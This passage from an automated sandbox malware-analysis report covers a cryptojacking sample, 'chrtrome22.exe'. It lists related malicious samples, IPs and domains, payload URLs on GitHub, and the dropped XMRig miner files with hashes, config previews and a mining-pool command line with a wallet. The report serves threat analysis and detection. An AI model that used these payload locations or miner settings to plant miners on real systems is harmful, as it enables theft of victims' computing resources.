                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      02:42:09API Interceptor49x Sleep call for process: chrtrome22.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      140.82.121.4RfORrHIRNe.docGet hashmaliciousUnknownBrowse
                                                      • github.com/ssbb36/stv/raw/main/5.mp3
                                                      206.189.156.69174.exeGet hashmaliciousXmrigBrowse
                                                      • wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun/
                                                      http://clj9550f4aogrc0ma63gxc5ss4f8ekeaw.oast.fun/Get hashmaliciousUnknownBrowse
                                                      • clj9550f4aogrc0ma63gxc5ss4f8ekeaw.oast.fun/favicon.ico
                                                      http://cis0opnpgi3ck7n7uo90antqh5rn679xx.oast.funGet hashmaliciousUnknownBrowse
                                                      • cis0opnpgi3ck7n7uo90antqh5rn679xx.oast.fun/favicon.ico
                                                      185.199.110.133sys_upd.ps1Get hashmaliciousUnknownBrowse
                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                      cr_asm_menu..ps1Get hashmaliciousUnknownBrowse
                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                      cr_asm_phshop..ps1Get hashmaliciousUnknownBrowse
                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                      cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                      vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                      xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                      Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                      cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                      SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_mnr.txt

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      github.compTVKHqys2h.exeGet hashmaliciousXmrigBrowse
                                                      • 140.82.121.4
                                                      z.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                      • 140.82.121.4
                                                      h.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                      • 140.82.121.4
                                                      174.exeGet hashmaliciousXmrigBrowse
                                                      • 140.82.121.3
                                                      spreadmalware.exeGet hashmaliciousXWormBrowse
                                                      • 140.82.121.3
                                                      Customer.exeGet hashmaliciousXWormBrowse
                                                      • 140.82.121.4
                                                      Solara Bootstrapper.exeGet hashmaliciousUnknownBrowse
                                                      • 140.82.121.3
                                                      Solara.exeGet hashmaliciousUnknownBrowse
                                                      • 140.82.121.4
                                                      https://github.com/eclipse-ecal/ecal/releases/download/v5.13.3/ecal_5.13.3-win64.exeGet hashmaliciousUnknownBrowse
                                                      • 140.82.121.3
                                                      PO#6100008 Jan04.02.2024.Xls.jsGet hashmaliciousWSHRat, STRRATBrowse
                                                      • 140.82.121.4
                                                      objects.githubusercontent.compTVKHqys2h.exeGet hashmaliciousXmrigBrowse
                                                      • 185.199.110.133
                                                      174.exeGet hashmaliciousXmrigBrowse
                                                      • 185.199.109.133
                                                      spreadmalware.exeGet hashmaliciousXWormBrowse
                                                      • 185.199.111.133
                                                      https://github.com/eclipse-ecal/ecal/releases/download/v5.13.3/ecal_5.13.3-win64.exeGet hashmaliciousUnknownBrowse
                                                      • 185.199.109.133
                                                      ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                      • 185.199.108.133
                                                      ep_setup.exeGet hashmaliciousUnknownBrowse
                                                      • 185.199.110.133
                                                      ep_setup.exeGet hashmaliciousUnknownBrowse
                                                      • 185.199.110.133
                                                      https://pdf.ac/3eQ2mdGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                      • 185.199.108.133
                                                      https://github.com/starise/win11-virtual-desktop-extension/releases/download/1.1.0/VirtualDesktopExtension-1.1.0.msiGet hashmaliciousUnknownBrowse
                                                      • 185.199.108.133
                                                      in.exeGet hashmaliciousBabadeda, HTMLPhisherBrowse
                                                      • 185.199.111.133
                                                      wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun174.exeGet hashmaliciousXmrigBrowse
                                                      • 206.189.156.69
                                                      pool-fr.supportxmr.com174.exeGet hashmaliciousXmrigBrowse
                                                      • 141.94.96.144
                                                      file.exeGet hashmaliciousXmrigBrowse
                                                      • 141.94.96.144
                                                      SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeGet hashmaliciousXmrigBrowse
                                                      • 141.94.96.71
                                                      file.exeGet hashmaliciousXmrigBrowse
                                                      • 141.94.96.71
                                                      egFMhHSlmf.exeGet hashmaliciousXmrigBrowse
                                                      • 141.94.96.71
                                                      xmr_linux_amd64 (2).elfGet hashmaliciousXmrigBrowse
                                                      • 141.94.96.195
                                                      xmr_linux_amd64.elfGet hashmaliciousXmrigBrowse
                                                      • 141.94.96.195
                                                      SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeGet hashmaliciousXmrigBrowse
                                                      • 141.94.96.144
                                                      Q3pEXxmWAD.exeGet hashmaliciousXmrigBrowse
                                                      • 141.94.96.195
                                                      file.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse
                                                      • 141.94.96.71
                                                      evilbit.pro174.exeGet hashmaliciousXmrigBrowse
                                                      • 104.21.95.99

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      CLOUDFLARENETUSQUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                      • 104.21.64.1
                                                      xCnwCctDWC.exeGet hashmaliciousLummaCBrowse
                                                      • 104.21.56.70
                                                      DLKs2Qeljg.exeGet hashmaliciousLummaCBrowse
                                                      • 104.21.56.70
                                                      fuk7RfLrD3.exeGet hashmaliciousLummaCBrowse
                                                      • 104.21.80.1
                                                      Ljrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                      • 104.21.64.1
                                                      PO1178236.scr.exeGet hashmaliciousUnknownBrowse
                                                      • 188.114.96.3
                                                      Subscription_Renewal_Invoice_2025_FGHDCS.htmlGet hashmaliciousHTMLPhisherBrowse
                                                      • 188.114.96.3
                                                      PO1178236.scr.exeGet hashmaliciousUnknownBrowse
                                                      • 188.114.96.3
                                                      DPlvBkg4aj.exeGet hashmaliciousLummaCBrowse
                                                      • 104.21.112.1
                                                      https://qr.me-qr.com/PVhBu5SRGet hashmaliciousUnknownBrowse
                                                      • 188.114.97.3
                                                      DIGITALOCEAN-ASNUShttps://qr.me-qr.com/pt/E9k76ewGet hashmaliciousUnknownBrowse
                                                      • 134.122.57.34
                                                      watchdog.elfGet hashmaliciousXmrigBrowse
                                                      • 67.205.135.145
                                                      3.elfGet hashmaliciousUnknownBrowse
                                                      • 157.230.1.137
                                                      https://redduppgh.com/Get hashmaliciousUnknownBrowse
                                                      • 159.89.102.253
                                                      arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                      • 167.174.154.107
                                                      http://hockey30.comGet hashmaliciousUnknownBrowse
                                                      • 134.122.57.34
                                                      https://veryfast.io/?ap=adw&as=g_d_fast_in&dm%5Bads%5D=new_static&dm%5Btype%5D=dis&gad_source=5&gclid=EAIaIQobChMIgp352NzmigMVZAOzAB0wMA8oEAEYASAAEgI_hfD_BwEGet hashmaliciousUnknownBrowse
                                                      • 167.99.235.203
                                                      http://cdn.statisticline.comGet hashmaliciousUnknownBrowse
                                                      • 165.22.209.237
                                                      Q1 Statements.htmlGet hashmaliciousUnknownBrowse
                                                      • 178.62.32.18
                                                      174.exeGet hashmaliciousXmrigBrowse
                                                      • 206.189.156.69
                                                      GITHUBUSpTVKHqys2h.exeGet hashmaliciousXmrigBrowse
                                                      • 140.82.121.4
                                                      z.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                      • 140.82.121.4
                                                      h.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                      • 140.82.121.4
                                                      174.exeGet hashmaliciousXmrigBrowse
                                                      • 140.82.121.3
                                                      spreadmalware.exeGet hashmaliciousXWormBrowse
                                                      • 140.82.121.3
                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XWorm, XmrigBrowse
                                                      • 140.82.121.4
                                                      Customer.exeGet hashmaliciousXWormBrowse
                                                      • 140.82.121.4
                                                      Solara Bootstrapper.exeGet hashmaliciousUnknownBrowse
                                                      • 140.82.121.3
                                                      Solara.exeGet hashmaliciousUnknownBrowse
                                                      • 140.82.121.4
                                                      https://github.com/eclipse-ecal/ecal/releases/download/v5.13.3/ecal_5.13.3-win64.exeGet hashmaliciousUnknownBrowse
                                                      • 140.82.121.3

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      3b5074b1b5d032e5620f69f9f700ff0e5dFLJyS86S.ps1Get hashmaliciousUnknownBrowse
                                                      • 172.67.144.26
                                                      • 140.82.121.4
                                                      • 185.199.110.133
                                                      PO1178236.scr.exeGet hashmaliciousUnknownBrowse
                                                      • 172.67.144.26
                                                      • 140.82.121.4
                                                      • 185.199.110.133
                                                      Purchase Order A2409002.scr.exeGet hashmaliciousUnknownBrowse
                                                      • 172.67.144.26
                                                      • 140.82.121.4
                                                      • 185.199.110.133
                                                      PO1178236.scr.exeGet hashmaliciousUnknownBrowse
                                                      • 172.67.144.26
                                                      • 140.82.121.4
                                                      • 185.199.110.133
                                                      Ref#103052.exeGet hashmaliciousXWormBrowse
                                                      • 172.67.144.26
                                                      • 140.82.121.4
                                                      • 185.199.110.133
                                                      NEW PURCHASE INQUIRY.scr.exeGet hashmaliciousUnknownBrowse
                                                      • 172.67.144.26
                                                      • 140.82.121.4
                                                      • 185.199.110.133
                                                      https://redduppgh.com/Get hashmaliciousUnknownBrowse
                                                      • 172.67.144.26
                                                      • 140.82.121.4
                                                      • 185.199.110.133
                                                      https://minia.n1tab.com/Get hashmaliciousUnknownBrowse
                                                      • 172.67.144.26
                                                      • 140.82.121.4
                                                      • 185.199.110.133
                                                      http://topmarktingplace.com/4vfVEJ42616owhy1324yhmrkkdpck110EVYGTFUNAFUPGFT22589MFQQ17548D10Get hashmaliciousUnknownBrowse
                                                      • 172.67.144.26
                                                      • 140.82.121.4
                                                      • 185.199.110.133
                                                      http://topmarktingplace.com/4KCrhO42616HeLs1324axlafysauc110UGQLALGLNEZCHJM22589XDWY17548d10Get hashmaliciousUnknownBrowse
                                                      • 172.67.144.26
                                                      • 140.82.121.4
                                                      • 185.199.110.133

                                                      Dropped Files

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      C:\xmrig\xmrig-6.22.2\WinRing0x64.syspTVKHqys2h.exeGet hashmaliciousXmrigBrowse
                                                        174.exeGet hashmaliciousXmrigBrowse
                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XWorm, XmrigBrowse
                                                            47SXvEQ.exeGet hashmaliciousBlank Grabber, XmrigBrowse
                                                              xmr new.exeGet hashmaliciousXmrigBrowse
                                                                eth.exeGet hashmaliciousXmrigBrowse
                                                                  file.exeGet hashmaliciousXmrigBrowse
                                                                    hiwA7Blv7C.exeGet hashmaliciousXmrigBrowse
                                                                      5fr5gthkjdg71.exeGet hashmaliciousQuasar, R77 RootKitBrowse
                                                                        aAcx14Rjtw.exeGet hashmaliciousXmrigBrowse

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\chrtrome22.exe.log

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\chrtrome22.exe
                                                                          File Type:CSV text
                                                                          Category:dropped
                                                                          Size (bytes):4144
                                                                          Entropy (8bit):5.362092442072351
                                                                          Encrypted:false
                                                                          SSDEEP:96:iqbYqGSI6ozajtIzQ0cxYsAmSvBjwQYrKxmDRtzHeqKkCq10tpDuqDqjq+qs:iqbYqGcRIzQ0JyZtzHeqKkCq10tpDuqM
                                                                          MD5:C44BBB53B45AD54426D7114A75BF92F7
                                                                          SHA1:6880CC43427F746B2A95991A4227E2AFF730D8BB
                                                                          SHA-256:59980AEFCD665E616F6BEA75C32277E8EF14977C20033370623F1FCE78DC904F
                                                                          SHA-512:9421173BBC774551C24498720DB0F67459621E832BE265A7527797C14D419D09A0C9986E7ECAE9331D810C3F78645E851E11B321075FD0C5C592500EB8D4578C
                                                                          Malicious:true
                                                                          Reputation:low
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\27947b366dfb4feddb2be787d72ca90d\System.Management.Automation.ni.dll",0..3,"Microsoft.PowerShell.Commands.Diagnostics, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\37a5ed6e6a6a48d370ee34b13c3e2b37\Microsoft.PowerShell.Commands.Diagnostics.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_135b2etk.xy1.psm1

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\chrtrome22.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:high, very likely benign file
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zw0o1iqr.gns.ps1

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\chrtrome22.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\Downloads\xmrig.zip

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\chrtrome22.exe
                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                          Category:dropped
                                                                          Size (bytes):2666251
                                                                          Entropy (8bit):7.996404011886235
                                                                          Encrypted:true
                                                                          SSDEEP:49152:u19rSOVxxqtG2008UtSAAL1B36NIldoRV04kjz7NZDT9AQJaMLPkXc0+OHd8HXK/:iASg6UEAEB3JldaV05z7TT9taUk0sCHQ
                                                                          MD5:57B7AB5BCE7D5E47FD168E1F0D437D32
                                                                          SHA1:050EEAE3E0F0E876F9DA175347B586871D14FE83
                                                                          SHA-256:1D903D39C7E4E1706C32C44721D6A6C851AA8C4C10DF1479478EE93CD67301BC
                                                                          SHA-512:8CC6E3E0E78F706172A47BEF261E1D73CE882CE531FE51177BA46CEE659128E2115311D348CA07A717FF737E4BC802C7CA4CC57DE716CBE55202B9482B5E2022
                                                                          Malicious:false
                                                                          Preview:PK........1ucY................xmrig-6.22.2/PK.........ucY=...=...=.......xmrig-6.22.2/benchmark_10M.cmd@echo off.cd /d "%~dp0".xmrig.exe --bench=10M --submit.pause.PK.........ucY....<...<.......xmrig-6.22.2/benchmark_1M.cmd@echo off.cd /d "%~dp0".xmrig.exe --bench=1M --submit.pause.PK.........ucYP.V.....*.......xmrig-6.22.2/config.json.V.k.0.~._Q.\eIJ;.[.}....c......_;.n...>...V...@..;...tw.........r...D..u%....jh...P......{...........@.q>.....d......."8=2.....f.zL..y..7[y....*o...b.u.|]...^.4...^x9XO.s.6......ocPo.C@.<...;N.V,...]B7..=..P.....iR.t.`..q..K.....0</Z.....V...,..w...c?.O..+..pt.!.cD.2.e......(...l./.!w....t...sj...0z..r..w.@...x.z.....s..9.1-i GJh&....D.....q&.l..k....\....Z./:....I.1........lwX.`+!..+.....[.s..ABY.Q*.@.:.T.Hul&.|.Q$..7..:|...k..~....r....iq......2t..\t.....0.....Kpe...^#Z...>......r?..H.[.H.B....Z...._...B.r...r..Z*....L.F...{.5O..:....PQ..iw.!H_.4.+1.:0.V.T.9X..p.GV.u...Iwr.._....n......5n...%.;.T...h.n.......A....$..=r=...

                                                                          C:\xmrig\xmrig-6.22.2\SHA256SUMS

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\chrtrome22.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):748
                                                                          Entropy (8bit):4.687094484887319
                                                                          Encrypted:false
                                                                          SSDEEP:12:luxgnoy/wHIX+XhsYyc+ATPJT5RwR4CRIh7wOtf8CuuS0mzwcHYz4WI9:Kgnoy/qIORG+d5eRdOt1ud0y7WI9
                                                                          MD5:C7A209DEE0F5D1C6C3DD496BA22F78AB
                                                                          SHA1:1E56F76DDE40B12443C544BD9D0B9BA48960B0B0
                                                                          SHA-256:C83B38B121842A02FB910FE260C83CCED6AA90663C2A1626231FF5122850DEE8
                                                                          SHA-512:DF57851FFDB741270EB166481768B923ACBF2AA4BF97F18714048CD9CFFF9CBAAAA078C278C3E2057850AC77728423A2C9F701E0084BBF8F94BD7F56B11456DB
                                                                          Malicious:false
                                                                          Preview:11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5 *WinRing0x64.sys.235a64e3520b1c2c27763122b303f78aee8d7c083dfd9f1eb936cd5174383609 *benchmark_10M.cmd.d7747e7a3c782009f4ceb6e9c106115876386853929563b509da5258e3968d15 *benchmark_1M.cmd.2b03943244871ca75e44513e4d20470b8f3e0f209d185395de82b447022437ec *config.json.e73491065d86b1ad69229bb5d2019e08b947e11a2a57adf5c2d9a2b5d8f4acad *pool_mine_example.cmd.810614290bdb14d2ddf10f65f8adc988a8272764f2a9e2c378e52fad162da344 *rtm_ghostrider_example.cmd.33497c69c21fa96bbc96f1d7f09608e462f8ab22555364977c0bd35fef27bc29 *solo_mine_example.cmd.8e70ef38fe14a2ee2848df3d6f7e260d1caf8cfc15de694d678b8af151d62333 *start.cmd.d2fcf28897ddc2137141d838b734664ff7592e03fcd467a433a51cb4976b4fb1 *xmrig.exe.

                                                                          C:\xmrig\xmrig-6.22.2\WinRing0x64.sys

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\chrtrome22.exe
                                                                          File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):14544
                                                                          Entropy (8bit):6.2660301556221185
                                                                          Encrypted:false
                                                                          SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                          MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                          SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                          SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                          SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                                          Joe Sandbox View:
                                                                          • Filename: pTVKHqys2h.exe, Detection: malicious, Browse
                                                                          • Filename: 174.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: 47SXvEQ.exe, Detection: malicious, Browse
                                                                          • Filename: xmr new.exe, Detection: malicious, Browse
                                                                          • Filename: eth.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: hiwA7Blv7C.exe, Detection: malicious, Browse
                                                                          • Filename: 5fr5gthkjdg71.exe, Detection: malicious, Browse
                                                                          • Filename: aAcx14Rjtw.exe, Detection: malicious, Browse
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                          C:\xmrig\xmrig-6.22.2\benchmark_10M.cmd

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\chrtrome22.exe
                                                                          File Type:DOS batch file, ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):61
                                                                          Entropy (8bit):4.738457731772711
                                                                          Encrypted:false
                                                                          SSDEEP:3:mKDD3M/PKXD0dAyIgytoyrIJnn:h7dXD0frsoD
                                                                          MD5:5BE1C4CACB5AE37C43527E99A097DC7A
                                                                          SHA1:1B2F00FEFDE9D601764D5D26D5E0FB2B9F58074C
                                                                          SHA-256:235A64E3520B1C2C27763122B303F78AEE8D7C083DFD9F1EB936CD5174383609
                                                                          SHA-512:20A9E18BC397FE86514875AF4213A02A5831A27671370849F05C2F3BA048BC29FC41CA96F0CB1CC08AAFF27BBEBF637F30D2EE798CB80ED03080E8C7D8F2D9A1
                                                                          Malicious:false
                                                                          Preview:@echo off.cd /d "%~dp0".xmrig.exe --bench=10M --submit.pause.

                                                                          C:\xmrig\xmrig-6.22.2\benchmark_1M.cmd

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\chrtrome22.exe
                                                                          File Type:DOS batch file, ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.7280729963885095
                                                                          Encrypted:false
                                                                          SSDEEP:3:mKDD3M/PKXD0dAyIgydsJnn:h7dXD0frZ
                                                                          MD5:CBA1927CF6959DC99ECBD0C553E4DB6F
                                                                          SHA1:7F2D59CFDF2B0550D22AC54D0B1FA5AC8F8B5F57
                                                                          SHA-256:D7747E7A3C782009F4CEB6E9C106115876386853929563B509DA5258E3968D15
                                                                          SHA-512:C78AB9B017153C497EF2D0F568ADE265AE9B60238EBDB36D8EF7ECC4D232CD90FD5FDC5B600BB26437466C7300E571B95B4FF92A7F024A981A02196A14D6E3F1
                                                                          Malicious:false
                                                                          Preview:@echo off.cd /d "%~dp0".xmrig.exe --bench=1M --submit.pause.

                                                                          C:\xmrig\xmrig-6.22.2\config.json

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\chrtrome22.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):3435
                                                                          Entropy (8bit):4.0435229723591455
                                                                          Encrypted:false
                                                                          SSDEEP:48:CtWTHcfLWHW8b9b2lZ9lCfnT1L8njzLn9ocyWokkX7yWokk/w4KD5r:CtWTGyHpT1L8njzLHWDp
                                                                          MD5:098F463E92B096A1D7C5CD4AD0322DD7
                                                                          SHA1:8D17348EA2A2CCDFE209C831C4CBAAE34FD83D68
                                                                          SHA-256:12CD851F0ABE192DEAC7F4FF0A939F6C65D076BD0265FC416E81AC210BF55DFB
                                                                          SHA-512:D17860E33CB5650E4EBC374CED09D4F97C3075D09A80FD462DEBCC090DCB0013AD8087795E0629BC8DF84B40343BC2484A0C629BDCB57A899C177DE88F4BB444
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\xmrig\xmrig-6.22.2\config.json, Author: Joe Security
                                                                          Preview:{. "api": {. "id": null,. "worker-id": null. },. "http": {. "enabled": false,. "host": "127.0.0.1",. "port": 0,. "access-token": null,. "restricted": true. },. "autosave": true,. "background": false,. "colors": true,. "title": true,. "randomx": {. "init": -1,. "init-avx2": -1,. "mode": "auto",. "1gb-pages": false,. "rdmsr": true,. "wrmsr": true,. "cache_qos": false,. "numa": true,. "scratchpad_prefetch_mode": 1. },. "cpu": {. "enabled": true,. "huge-pages": true,. "huge-pages-jit": false,. "hw-aes": null,. "priority": null,. "memory-pool": false,. "yield": true,. "asm": true,. "argon2-impl": null,. "argon2": [0, 1],. "cn": [. [1, 0],. [1, 1]. ],. "cn-heavy": [. [1, 0],. [1, 1]. ],. "cn-lite": [.

                                                                          C:\xmrig\xmrig-6.22.2\pool_mine_example.cmd

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\chrtrome22.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):1023
                                                                          Entropy (8bit):4.944208285706554
                                                                          Encrypted:false
                                                                          SSDEEP:24:knECAL1ACWm4Vw5fP5t59XMaoGaK8IZAR0x+FcU71Mtzkz7CQhvvFIVV+XD/Ve:8ErG58pPS5GapIWG+Fcc1Vz7LhvvMVwM
                                                                          MD5:2E737F5C3AF9C8AA5216DFDC5BE02CC6
                                                                          SHA1:05FE2040AEA6F6CFF25DEAF5CA2CA6793FAA64C7
                                                                          SHA-256:E73491065D86B1AD69229BB5D2019E08B947E11A2A57ADF5C2D9A2B5D8F4ACAD
                                                                          SHA-512:CE0E12A544623458F5905EA20F2B6F0E75CFB57ADD912290FBF2611EDDBE98DE7FFED3C9E650747967B2620E5EBBE33E249CBD60E7032BDB10C909CC516709CA
                                                                          Malicious:false
                                                                          Preview::: Example batch file for mining Monero at a pool.::.:: Format:.::.xmrig.exe -o <pool address>:<pool port> -u <pool username/wallet> -p <pool password>.::.:: Fields:.::.pool address..The host name of the pool stratum or its IP address, for example pool.hashvault.pro.::.pool port ..The port of the pool's stratum to connect to, for example 3333. Check your pool's getting started page..::.pool username/wallet .For most pools, this is the wallet address you want to mine to. Some pools require a username.::.pool password ..For most pools this can be just 'x'. For pools using usernames, you may need to provide a password as configured on the pool..::.:: List of Monero mining pools:.::.https://miningpoolstats.stream/monero.::.:: Choose pools outside of top 5 to help Monero network be more decentralized!.:: Smaller pools also often have smaller fees/payout limits...cd /d "%~dp0".xmrig.exe -o xmrpool.eu:3333 -u 48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdU

                                                                          C:\xmrig\xmrig-6.22.2\rtm_ghostrider_example.cmd

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\chrtrome22.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):1220
                                                                          Entropy (8bit):4.575573022986975
                                                                          Encrypted:false
                                                                          SSDEEP:24:knTXzrL1ACvs4VYt5ONwvoGsPZAR0x+FcVtUtzH37CQhvvPI5E9c6I5E/Ywke:8T3G4HWPnwGsPWG+FcVK7LhvvPOMOoNt
                                                                          MD5:3F0155ABE745BE1F6089EAFC4F517AC8
                                                                          SHA1:277F510CEB62B277B141D094C82EEDEBDC6F3A35
                                                                          SHA-256:810614290BDB14D2DDF10F65F8ADC988A8272764F2A9E2C378E52FAD162DA344
                                                                          SHA-512:8DEF46852A962FF5DBED94E01F8D23019EF401A718D9C5A440D12B2FFA369539BE328F165F68CCC2098CD5E5C939BCB5F784F877BDD7B9D939393BBD2229D19E
